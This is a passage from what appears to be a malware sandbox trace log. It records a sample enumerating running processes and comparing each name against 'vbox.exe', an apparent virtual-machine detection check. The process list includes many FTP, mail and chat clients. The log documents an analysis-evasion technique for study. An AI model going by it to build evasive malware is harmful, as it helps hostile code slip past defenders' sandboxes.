| out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0122.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taskhostw.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.223] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.224] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0122.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WmiPrvSE.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.310] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0122.312] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMIADAP.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.312] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0122.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sppsvc.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.314] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0122.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WmiPrvSE.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.316] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0122.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iexplore.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.318] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0122.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.319] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0122.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.321] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0122.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.323] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0122.324] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iexplore.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.324] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="claim.exe")) returned 1 [0122.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="claim.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.325] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="quite do.exe")) returned 1 [0122.328] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="quite do.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.328] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="drop.exe")) returned 1 [0122.329] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="drop.exe", cchCount1=8, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.330] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="that_but.exe")) returned 1 [0122.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="that_but.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.332] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="knowledge sign.exe")) returned 1 [0122.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="knowledge sign.exe", cchCount1=18, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.333] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="watch.exe")) returned 1 [0122.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="watch.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.335] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="raiseleftbuy.exe")) returned 1 [0122.336] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="raiseleftbuy.exe", cchCount1=16, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.336] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosouth.exe")) returned 1 [0122.338] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="whosouth.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.338] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="clear.exe")) returned 1 [0122.339] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="clear.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.339] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1050, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factor-western-forget.exe")) returned 1 [0122.341] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="factor-western-forget.exe", cchCount1=25, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.341] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="throwtowardpurpose.exe")) returned 1 [0122.342] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="throwtowardpurpose.exe", cchCount1=22, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.342] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="camera.exe")) returned 1 [0122.344] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="camera.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.344] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="arrive.exe")) returned 1 [0122.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="arrive.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.357] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="storypolice.exe")) returned 1 [0122.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="storypolice.exe", cchCount1=15, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.358] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nothing foreign.exe")) returned 1 [0122.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nothing foreign.exe", cchCount1=19, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.360] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="move.exe")) returned 1 [0122.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="move.exe", cchCount1=8, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.361] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="include effect seven.exe")) returned 1 [0122.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="include effect seven.exe", cchCount1=24, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.362] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="serve.exe")) returned 1 [0122.364] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="serve.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.364] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weaponnatural.exe")) returned 1 [0122.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="weaponnatural.exe", cchCount1=17, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.367] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alftp.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.369] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0122.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3dftp.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.371] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0122.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="absolutetelnet.exe", cchCount1=18, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.373] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0122.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="barca.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.376] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0122.379] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fling.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.379] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0122.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flashfxp.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.382] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0122.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="filezilla.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.385] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0122.387] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="far.exe", cchCount1=7, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.387] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0122.390] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bitkinex.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.391] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0122.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="coreftp.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.396] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0122.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="operamail.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.400] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0122.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="notepad.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.402] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0122.405] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="leechftp.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.405] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0122.407] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="scriptftp.exe", cchCount1=13, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.407] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0122.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pidgin.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.410] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0122.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ncftp.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.412] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0122.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="skype.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.414] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0122.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icq.exe", cchCount1=7, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.416] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0122.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="winscp.exe", cchCount1=10, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.418] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0122.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gmailnotifierpro.exe", cchCount1=20, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.420] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0122.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="foxmailincmail.exe", cchCount1=18, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.422] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0122.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="webdrive.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.424] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0122.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="trillian.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.426] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0122.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="thunderbird.exe", cchCount1=15, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.428] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0122.430] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smartftp.exe", cchCount1=12, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.430] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0122.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yahoomessenger.exe", cchCount1=18, lpString2="vbox.exe", cchCount2=8) returned 3 [0122.461] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0122.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="outlook.exe", cchCount1=11, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.463] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0122.465] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 